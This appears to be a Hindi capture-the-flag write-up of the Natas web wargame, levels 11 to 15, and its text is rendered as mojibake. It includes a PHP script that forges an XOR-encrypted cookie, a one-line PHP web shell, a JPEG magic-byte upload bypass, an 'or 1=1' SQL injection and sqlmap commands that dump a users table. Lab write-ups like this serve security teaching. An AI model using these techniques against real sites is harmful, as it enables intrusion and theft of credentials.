
рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ, рд╣рдо рдПрдХ рдЙрджрд╛рд╣рд░рдг рдХреЗ рд░реВрдк рдореЗрдВ
рдирд╛рдЯреНрд╕ рд╡реЙрд░рдЧреЗрдореНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХреБрдЫ
WEB- рдкрд╣рдЪрд╛рди рдХреЗ рд╕рдВрдЪрд╛рд▓рди рд╕реЗ рдирд┐рдкрдЯреЗрдВрдЧреЗред рдкреНрд░рддреНрдпреЗрдХ рд╕реНрддрд░ рдкрд░ рдЕрдЧрд▓реЗ рд╕реНрддрд░ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рддрдХ рдкрд╣реБрдВрдЪ рд╣реИред рд╕рднреА рдкрд╛рд╕рд╡рд░реНрдб / etc / natas_webpass / files рдореЗрдВ рднреА рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, natas5 рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдлрд╝рд╛рдЗрд▓ / etc / natas_webpass / natas5 рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИ рдФрд░ рдХреЗрд╡рд▓ natas4 рдФрд░ natas5 рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдкрдврд╝рд╛ рдЬрд╛рддрд╛ рд╣реИред
рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЬрд╛рдирдХрд╛рд░реАрд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЬреЛ рд╕реВрдЪрдирд╛ рдФрд░ рдХрдВрдкреНрдпреВрдЯрд░ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХрд┐рд╕реА рднреА рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХреБрдЫ рдирдпрд╛ рд╕реАрдЦрдирд╛ рдФрд░ рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдореИрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╢реНрд░реЗрдгрд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд▓рд┐рдЦреВрдВрдЧрд╛ рдФрд░ рдмрд╛рдд рдХрд░реВрдВрдЧрд╛:
- PWN;
- рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлреА (рдХреНрд░рд┐рдкреНрдЯреЛ);
- рдиреЗрдЯрд╡рд░реНрдХ рдЯреЗрдХреНрдиреЛрд▓реЙрдЬреАрдЬ (рдиреЗрдЯрд╡рд░реНрдХ);
- рд░рд┐рд╡рд░реНрд╕ (рд░рд┐рд╡рд░реНрд╕ рдЗрдВрдЬреАрдирд┐рдпрд░рд┐рдВрдЧ);
- рд╕реНрдЯреЗрдЧреНрдиреЛрдЧреНрд░рд╛рдлрд╝реА (рд╕реНрдЯреЗрдЧреНрдиреЛ);
- WEB рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреА рдЦреЛрдЬ рдФрд░ рдЙрдирдХрд╛ рджреЛрд╣рдиред
рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдореИрдВ рдЕрдкрдиреЗ рдЕрдиреБрднрд╡ рдХреЛ рдХрдВрдкреНрдпреВрдЯрд░ рдлреЛрд░реЗрдВрд╕рд┐рдХ, рдореИрд▓рд╡реЗрдпрд░ рдФрд░ рдлрд░реНрдорд╡реЗрдпрд░ рдХреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг, рд╡рд╛рдпрд░рд▓реЗрд╕ рдиреЗрдЯрд╡рд░реНрдХ рдФрд░ рд╕реНрдерд╛рдиреАрдп рдХреНрд╖реЗрддреНрд░ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рд╣рдорд▓реЗ, рдкреЗрдВрдЯреЗрд╕реНрдЯ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рдиреЗ рдФрд░ рдХрд╛рд░рдирд╛рдореЗ рд▓рд┐рдЦрдиреЗ рдореЗрдВ рд╕рд╛рдЭрд╛ рдХрд░реВрдВрдЧрд╛ред
рддрд╛рдХрд┐ рдЖрдк рдирдП рд▓реЗрдЦ, рд╕реЙрдлреНрдЯрд╡реЗрдпрд░ рдФрд░ рдЕрдиреНрдп рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рдмрд╛рд░реЗ
рдореЗрдВ рдЬрд╛рди рд╕рдХреЗрдВ, рдореИрдВрдиреЗ
рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдореЗрдВ рдПрдХ
рдЪреИрдирд▓ рдмрдирд╛рдпрд╛ рдФрд░ рдЖрдИрд╕реАрдбреА рдХреЗ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ
рдХрд┐рд╕реА рднреА рдореБрджреНрджреЗ рдкрд░ рдЪрд░реНрдЪрд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ
рд╕рдореВрд╣ рдмрдирд╛рдпрд╛ред рд╕рд╛рде рд╣реА, рдореИрдВ рд╡реНрдпрдХреНрддрд┐рдЧрдд рд░реВрдк рд╕реЗ рдЖрдкрдХреЗ рд╡реНрдпрдХреНрддрд┐рдЧрдд рдЕрдиреБрд░реЛрдзреЛрдВ, рдкреНрд░рд╢реНрдиреЛрдВ, рд╕реБрдЭрд╛рд╡реЛрдВ рдФрд░ рд╕рд┐рдлрд╛рд░рд┐рд╢реЛрдВ рдкрд░
рд╡реНрдпрдХреНрддрд┐рдЧрдд рд░реВрдк рд╕реЗ рд╡рд┐рдЪрд╛рд░
рдХрд░реВрдВрдЧрд╛ рдФрд░ рд╕рднреА рдХрд╛ рдЬрд╡рд╛рдм рджреВрдВрдЧрд╛ ред
рд╕рднреА рдЬрд╛рдирдХрд╛рд░реА рдХреЗрд╡рд▓ рд╢реИрдХреНрд╖рд┐рдХ рдЙрджреНрджреЗрд╢реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд╛рди рдХреА рдЬрд╛рддреА рд╣реИред рдЗрд╕ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХрд╛ рд▓реЗрдЦрдХ рдЗрд╕ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХрд╛ рдЕрдзреНрдпрдпрди рдХрд░рдиреЗ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдкреНрд░рд╛рдкреНрдд рдЬреНрдЮрд╛рди рдФрд░ рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдХрд┐рд╕реА рдХреЛ рд╣реБрдП рдиреБрдХрд╕рд╛рди рдХреЗ рд▓рд┐рдП рдХреЛрдИ рдЬрд╝рд┐рдореНрдореЗрджрд╛рд░реА рдирд╣реАрдВ рдЙрдард╛рддрд╛ рд╣реИред
рд╕реНрддрд░ 11
рдкрд╛рд░реНрд╕ рдХреЛрдб:
- рдкрд╛рд╕рд╡рд░реНрдб рддрдм рдЙрдкрд▓рдмреНрдз рд╣реЛрдЧрд╛, рдЬрдм рдбреЗрдЯрд╛ рд╢реЛрдЬрд╝ рдХреЗ рд╕рд╛рде рдореБрдЦреНрдп рд╢реЛрдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдорд╛рди "рд╣рд╛рдБ" рд╣реЛ;

- рдбреЗрдЯрд╛ рд╕рд░рдгреА рд▓реЛрдбрдбреИрдЯ рдлрд╝рдВрдХреНрд╢рди рджреНрд╡рд╛рд░рд╛ рдмрдирд╛рдИ рдЧрдИ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдбреЗрдЯрд╛ рдХреЛ рдПрдХ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдкрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ;


- рд▓реЛрдбрдбреЗрдЯрд╛ рдлрд╝рдВрдХреНрд╢рди рдПрдХ рдХреБрдХреА рд╕реЗ рдбреЗрдЯрд╛ рдорд╛рдиреЛрдВ рдХреЛ рд▓реЛрдб рдХрд░рддрд╛ рд╣реИ (рдмреЗрд╕ 64 рдореЗрдВ рдбреЗрдЯрд╛ рдХреЛ рдХреВрдЯрддрд╛ рд╣реИ, рдПрдХ рдЕрдЬреНрдЮрд╛рдд рдХреБрдВрдЬреА рдкрд░ рдПрдХреНрд╕реЛрд░ рдХреЛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд░рддрд╛ рд╣реИ, рдЬреЛрд╕рди рдкреНрд░рд╛рд░реВрдк рдореЗрдВ рдбреЗрдЯрд╛ рдХреЛ рдбреАрдХреЛрдб рдХрд░рддрд╛ рд╣реИ);


- рдкреНрд░рд╛рдкреНрдд рдореВрд▓реНрдпреЛрдВ рдХреЛ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рддрд╛ рд╣реИред
рдЖрдкрдХреЛ рдХреНрдпрд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:
- рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд XOR рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреБрдВрдЬреА:
- рдПрдХ рдХреБрдХреА рд╕реЗ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдбреЗрдЯрд╛ рд▓реЗ;
- рдбрд┐рдХреЛрдб рдмреЗрд╕ 64;
- json рдкреНрд░рд╛рд░реВрдк рдореЗрдВ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдбреЗрдЯрд╛ рд╕рд╛рдВрдХреЗрддрд┐рдХ рд╢рдмреНрджреЛрдВ рдореЗрдВ рдмрджрд▓рдирд╛;
- рдкреНрд░реЙрдХреНрд╕реА рдХреЛ рд╕рдордпрд╕реАрдорд╛ рдкреНрд░рд╛рдкреНрдд рд╣реБрдИред
- рдЙрд▓рдЯрд╛ рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдирдП рдбреЗрдЯрд╛ рдХреЛ рдПрдиреНрдХреЛрдб рдФрд░ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВ, рдЬрд╣рд╛рдВ showpassword == рд╣рд╛рдБ ;
- рдХреБрдХреА рдореЗрдВ рдирдпрд╛ рдбреЗрдЯрд╛ рдбрд╛рд▓реЗрдВ рдФрд░ рдкреГрд╖реНрда рдХреЛ рдлрд┐рд░ рд╕реЗ рд▓реЛрдб рдХрд░реЗрдВред

<?php function xor_encrypt($in, $k) { $key = $k; $text = $in; $outText = ''; for($i=0;$i<strlen($text);$i++) { $outText .= $text[$i] ^ $key[$i % strlen($key)]; } return $outText; } $old_data_code = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw"; $old_data_decode = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); $new_data_decode = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"); $KEY = xor_encrypt(base64_decode($old_data_code), json_encode($old_data_decode)); echo "key: ". $KEY . "\n"; $KEY="qw8J"; $new_data_code = base64_encode(xor_encrypt(json_encode($new_data_decode), $KEY)); echo "new cookie: " . $new_data_code . "\n"; ?>


рд╕реНрддрд░ 12
рдЬрдм рдЖрдк рдлрд╝рд╛рдЗрд▓ рдХреЛ рд╕рд╛рдЗрдЯ рдкрд░ рд╕рд╣реЗрдЬрддреЗ рд╣реИрдВ, рддреЛ рдпрд╣ рдПрдХ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдирд╛рдо рдФрд░ JPEG рдПрдХреНрд╕рдЯреЗрдВрд╢рди рдХреЗ рддрд╣рдд рд╕рд╣реЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред рд▓реЗрдХрд┐рди рд╕рдмрд╕реЗ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдмрд╛рдд рдпрд╣ рд╣реИ рдХрд┐ рдпрд╣ рдирд╛рдо рдлрд╝рд╛рдЗрд▓ рдХреЗ рдЪрдпрди рд╕реЗ рдкрд╣рд▓реЗ рд╣реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЫрд┐рдкреЗ рд╣реБрдП рдлреЙрд░реНрдо рдХреЗ рдПрдХ рдЫрд┐рдкреЗ рд╣реБрдП рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдкреНрд░рджрд╛рди рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдФрд░ рдЙрд╕рдХреЗ рдмрд╛рдж рдЗрд╕реЗ рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕рд╛рде рд╕рд░реНрд╡рд░ рдкрд░ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред
рдХрд╛рд░реНрдп: php-shell рдмрдирд╛рдПрдБ, рд╕рд░реНрд╡рд░ рд╕реЗ рдЕрдиреБрд░реЛрдз рдХреЛ рд░реЛрдХреЗрдВ рдФрд░
рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдирд╛рдо * .php рдореЗрдВ рдмрджрд▓реЗрдВред
<? echo system($_GET["cmd"]); ?>

рд╣рдо Burp Suite рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ: рд╣рдордиреЗ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдкреНрд░реЙрдХреНрд╕реА рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЛ 127.0.0.1:8080 рдкрд░ рд╕реЗрдЯ рдХрд┐рдпрд╛ рд╣реИред рдЦреЛрд▓ рднреЗрдЬ рджреЛред рдкреНрд░реЙрдХреНрд╕реА рдЯреИрдм рдореЗрдВ, рд╣рдо рдЕрдиреБрд░реЛрдз рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рддреЗ рд╣реИрдВред



рд╣рдо рдЕрдкрдиреА рдлрд╛рдЗрд▓ рдХреЛ рд╕рд░реНрд╡рд░ рдкрд░ рднреЗрдЬрддреЗ рд╣реИрдВ, рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдХреЛ рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рд╕реЗ рд╣реЛрдХрд░ рдЧреБрдЬрд░рддреЗ рд╣реИрдВред
cat /etc/natas_webpass/natas13

рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреА рднреЗрджреНрдпрддрд╛ рдХреЛ рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдлрд╝рд╛рдЗрд▓ рдЕрдкрд▓реЛрдб рдХреЗ рд░реВрдк рдореЗрдВ рд╡рд░реНрдЧреАрдХреГрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред
рд╢реЗрд▓ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, php рд╕реНрдерд┐рд░рд╛рдВрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╕рдмрд╕реЗ рдЕрдЪреНрдЫрд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╕рд┐рд╕реНрдЯрдо рдлрд╝рдВрдХреНрд╢рди рдХрд╛ рдирд┐рд╖реНрдкрд╛рджрди рд╕рд░реНрд╡рд░ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖рд┐рджреНрдз рд╣реЛ рд╕рдХрддрд╛ рд╣реИред
рд╕реНрддрд░ 13
рд╕рд░реНрд╡рд░ рдкрд░ рд╕рдорд╛рди рд╢реЗрд▓ рдХреЛ рд╕рд╣реЗрдЬрддреЗ рд╕рдордп, рд╣рдореЗрдВ рдмрддрд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рдПрдХ рдЫрд╡рд┐ рдирд╣реАрдВ рд╣реИред рд╣рдо рдХреЛрдб рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рддреЗ рд╣реИрдВред

Exif_imagetype рдлрд╝рдВрдХреНрд╢рди рдореМрдЬреВрдж рд╣реИред


JPEG рдлрд╝рд╛рдЗрд▓ рдХреА рдЬрд╛рдБрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдпрд╣ рдлрд╝рдВрдХреНрд╢рди рдЖрдВрддрд░рд┐рдХ рдлрд╝рдВрдХреНрд╢рди is_jpeg рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рдлрд╝рд╛рдЗрд▓ рдХреЗ рдкрд╣рд▓реЗ рдЪрд╛рд░ рдмрд╛рдЗрдЯреНрд╕ рдХреА рдЬрд╛рдБрдЪ рдХрд░рддрд╛ рд╣реИред

рддрдереНрдп рдпрд╣ рд╣реИ рдХрд┐ php рджреБрднрд╛рд╖рд┐рдпрд╛ рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИ рдЬреЛ <рдХреЗ рдмреАрдЪ рд╣реИ? ?>, рдЕрдиреНрдп рд╕рднреА рд╡рд░реНрдгреЛрдВ рдХреЛ рд▓рдВрдШрдиред рд╣реЗрдХреНрд╕ рд╕рдВрдкрд╛рджрдХ рдореЗрдВ рдкрд┐рдЫрд▓реЗ рд╕реНрддрд░ рдХрд╛ рдЦреЛрд▓ рдЦреЛрд▓реЗрдВ рдФрд░ рдлрд╝рд╛рдЗрд▓ рдХреА рд╢реБрд░реБрдЖрдд рдореЗрдВ рдмрд╛рдЗрдЯреНрд╕ 0xFFD8FFE0 рдЬреЛрдбрд╝реЗрдВред

рдкрд┐рдЫрд▓реЗ рд╕реНрддрд░ рдХреЗ рд╕рд╛рде рд╕рд╛рджреГрд╢реНрдп рджреНрд╡рд╛рд░рд╛ рд╕рд╛рдЗрдЯ рдкрд░ рднреЗрдЬреЗрдВ рдФрд░ рдПрдХ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред

рд╕реНрддрд░ 14
рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдлреЙрд░реНрдо рдореЗрдВ рдПрдХ рд╕рд╛рдорд╛рдиреНрдп рддреНрд░реБрдЯрд┐ред рдбреЗрдЯрд╛рдмреЗрд╕ рдХреНрд╡реЗрд░реА:
SELECT * from users where username="username" and password="password";

рдЕрдиреБрд░реЛрдз рдХреЛ рд╣рдореЗрд╢рд╛ рд╕рдЪ рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИ: рд▓реЙрдЧрд┐рди = "рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ" рдпрд╛ 1 = 1 - "ред

рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рдпрд╛ 1 = 1 рд░рд┐рдЯрд░реНрди рд╕рд╣реА рд╣реИ, рдФрд░ рдмрд╛рдХреА рдЕрдиреБрд░реЛрдз рдкрд░ рдЯрд┐рдкреНрдкрдгреА рдХреА рдЧрдИ рд╣реИ:
SELECT * from users where username="admin" or 1=1;
рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓ рд▓реЗрддреЗ рд╣реИрдВред

рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреА рднреЗрджреНрдпрддрд╛ SQL рдЗрдВрдЬреЗрдХреНрд╢рди рдХреА рд╢реНрд░реЗрдгреА рдХреЗ рдЕрдВрддрд░реНрдЧрдд рдЖрддреА рд╣реИред
рд╕реНрддрд░ 15
рдЗрд╕ рд░реВрдк рдореЗрдВ, рд╣рдо sqlmap рдХреЗ рд╕рдВрдЪрд╛рд▓рди рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рддреЗ рд╣реИрдВред рдПрдХ рдЕрдиреБрд░реЛрдз рднреЗрдЬреЗрдВ рдФрд░ рдбреЗрдЯрд╛ рдФрд░ HTTP рд╣реЗрдбрд░ рдХреЛ рдЗрдВрдЯрд░рд╕реЗрдкреНрдЯ рдХрд░реЗрдВред


рд╣рдо рд╣реЗрдбрд░ рд╕реЗ рдХреЗрд╡рд▓ рдЖрд╡рд╢реНрдпрдХ рдЬрд╛рдирдХрд╛рд░реА рдХрд╛ рдЪрдпрди рдХрд░рддреЗ рд╣реИрдВред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ: рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ, рд╕рдВрджрд░реНрднрдХрд░реНрддрд╛, рдкреНрд░рд╛рдзрд┐рдХрд░рдгред Sqlmap рдкреИрд░рд╛рдореАрдЯрд░ рд╕реЗрдЯ рдХрд░реЗрдВ:
- -u "URL"
- - рд╣реЗрдбрд░ = "HTTP рд╣реЗрдбрд░, '\ n` рджреНрд╡рд╛рд░рд╛ рдЕрд▓рдЧ рдХрд┐рдП рдЧрдП"
- - рдбреЗрдЯрд╛ = "рдкреЛрд╕реНрдЯ рдЕрдиреБрд░реЛрдз рдбреЗрдЯрд╛"
- - current-db - рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░реЗрдВ рдХрд┐ рдХреМрди рд╕рд╛ рдбреЗрдЯрд╛рдмреЗрд╕ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ
- --tamper = space2comment - рд╕реНрдЯреНрд░рд┐рдВрдЧ / ** / рдХреЗ рд╕рд╛рде рдЕрдВрддрд░рд┐рдХреНрд╖ рдХреЛ рдмрджрд▓реЗрдВ (SQL рдореЗрдВ, рдпрд╣ рд╡рд╣реА рдмрд╛рдд рд╣реИ)
- - рд╕реНрддрд░ = (1-5) - рд╕реНрдХреИрди рд╕реНрддрд░
- - рдХреНрд░рд┐рд╕реН = (1-3) - рд╕реНрдХреИрдирд┐рдВрдЧ рдХрд╛ рдЬреЛрдЦрд┐рдо

Sqlmap рдиреЗ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдмреВрд▓рд┐рдпрди-рдЖрдзрд╛рд░рд┐рдд рдмреНрд▓рд╛рдЗрдВрдб рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рд▓рд┐рдП рдХрдордЬреЛрд░ рд╣реИ, рдФрд░ рд╕рд╣реА рдШрдЯрдирд╛ рдХреЗ рд▓рд┐рдП рд╕рд╣реА рдбреЗрдЯрд╛рдмреЗрд╕ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рджрд┐рдЦрд╛рддреА рд╣реИ (рдмрд╛рдж рдХреЗ рд╕реНрдХреИрди рдореЗрдВ, рдЖрдк рддреБрд░рдВрдд рдХрдордЬреЛрд░ рдкреИрд░рд╛рдореАрдЯрд░ рдФрд░ рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдкреНрд░рдХрд╛рд░ рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: -p рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ .chnique = B)ред
рдмреА: рдмреВрд▓рд┐рдпрди-рдЖрдзрд╛рд░рд┐рдд рдЕрдВрдзрд╛ SQL рдЗрдВрдЬреЗрдХреНрд╢рди
рдпреВ: рдпреВрдирд┐рдЕрди рдХреНрд╡реЗрд░реА рдПрд╕рдХреНрдпреВрдПрд▓ рдЗрдВрдЬреЗрдХреНрд╢рди
T: рд╕рдордп-рдЖрдзрд╛рд░рд┐рдд рдЕрдВрдзрд╛ SQL рдЗрдВрдЬреЗрдХреНрд╢рди
E: рддреНрд░реБрдЯрд┐-рдЖрдзрд╛рд░рд┐рдд SQL рдЗрдВрдЬреЗрдХреНрд╢рди
S: рд╕реНрдЯреИрдХреНрдб рдХреНрд╡реЗрд░реАрдЬрд╝ SQL рдЗрдВрдЬреЗрдХреНрд╢рди
Sqlmap рдиреЗ MySQL DBMS (рдмрд╛рдж рдХреЗ рд╕реНрдХреИрди рдореЗрдВ, рдкреИрд░рд╛рдореАрдЯрд░ --dbms = MySQL) рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдпрд╛ рдФрд░ рдкреВрдЫрд╛ рдХрд┐ рдХреНрдпрд╛ mysql рдХреЗ рд╕рдВрд╕реНрдХрд░рдг рдХреЛ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд╣рд╛рдБ рд╣реИ)ред

рд╕рдХрд▓реИрдореНрдк рдиреЗ рдмрддрд╛рдпрд╛ рдХрд┐ MySQL рдХрд╛ рд╕рдВрд╕реНрдХрд░рдг = = 5.0.12 (рдпрд╣ DBMS рдЙрдкрдпреЛрдЧрд┐рддрд╛ рд╕реНрдерд┐рд░рд╛рдВрдХ рдХрд╛ рдЪрдпрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╣реИ)ред

Sqlmap рдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд▓рд┐рдП рднрд╛рд░ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдФрд░ рдкреВрдЫрд╛ рдХрд┐ рдХреНрдпрд╛ рдЕрдиреНрдп рдорд╛рдкрджрдВрдбреЛрдВ рдХреА рдЬрд╛рдБрдЪ рдХреА рдЬрд╛рдиреА рдЪрд╛рд╣рд┐рдП (рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, рдирд╣реАрдВ)ред рдпрд╣ рд▓реЛрдб рдХреЛ рднреА рджрд░реНрд╢рд╛рддрд╛ рд╣реИред

рдиреЛрдб рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рдФрд░, рдЬреИрд╕рд╛ рдХрд┐ рд╣рдордиреЗ рдЕрдиреБрд░реЛрдз рдХрд┐рдпрд╛ рдерд╛, рд╡рд░реНрддрдорд╛рди рдбреЗрдЯрд╛рдмреЗрд╕: natas15ред


рдирдП рдЬреНрдЮрд╛рдд рдЖрдВрдХрдбрд╝реЛрдВ рдХреЛ рджреЗрдЦрддреЗ рд╣реБрдП, рд╣рдо natas15 рдбреЗрдЯрд╛рдмреЗрд╕ рд╕реЗ рддрд╛рд▓рд┐рдХрд╛рдУрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рддреЗ рд╣реИрдВ:
- -D "рдбреЗрдЯрд╛рдмреЗрд╕"
- - рдЯреЗрдмрд▓ - рдкрд░рд┐рднрд╛рд╖рд┐рдд рдЯреЗрдмрд▓

Sqlmap рдиреЗ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рддрд╛рд▓рд┐рдХрд╛ рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд┐рдпрд╛ред

рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рддрд╛рд▓рд┐рдХрд╛ рдореЗрдВ рдХреЙрд▓рдо рдкрд╣рдЪрд╛рдирддреЗ рд╣реИрдВ:
- -рдЯреА "рдЯреЗрдмрд▓"
- - рдХреЙрд▓рдо - рд╕реНрддрдВрднреЛрдВ рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рддреЗ рд╣реИрдВ

Sqlmap рдиреЗ 2 рдХреЙрд▓рдо рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд┐рдпрд╛ред

рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рддрд╛рд▓рд┐рдХрд╛ (рд╡рд┐рдХрд▓реНрдк - рдбрдВрдк) рдХреЛ рдбрдВрдк рдХрд░рддреЗ рд╣реИрдВред рдбрдВрдк рдореЗрдВ 3 рдорд┐рдирдЯ рд▓рдЧреЗред рд╣рдо 8 рдереНрд░реЗрдбреНрд╕ (- 8 рдереНрд░реЗрдбреНрд╕) рдореЗрдВ рдЕрдиреБрд░реЛрдз рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╣реИрдВ - рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк: 1 рдорд┐рдирдЯред

рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓ рд▓реЗрддреЗ рд╣реИрдВред
рдЬрд╛рд░реА рд░рдЦрд╛ рдЬрд╛рдПред рдЖрдк
рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдкрд░ рд╣рдорд╕реЗ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред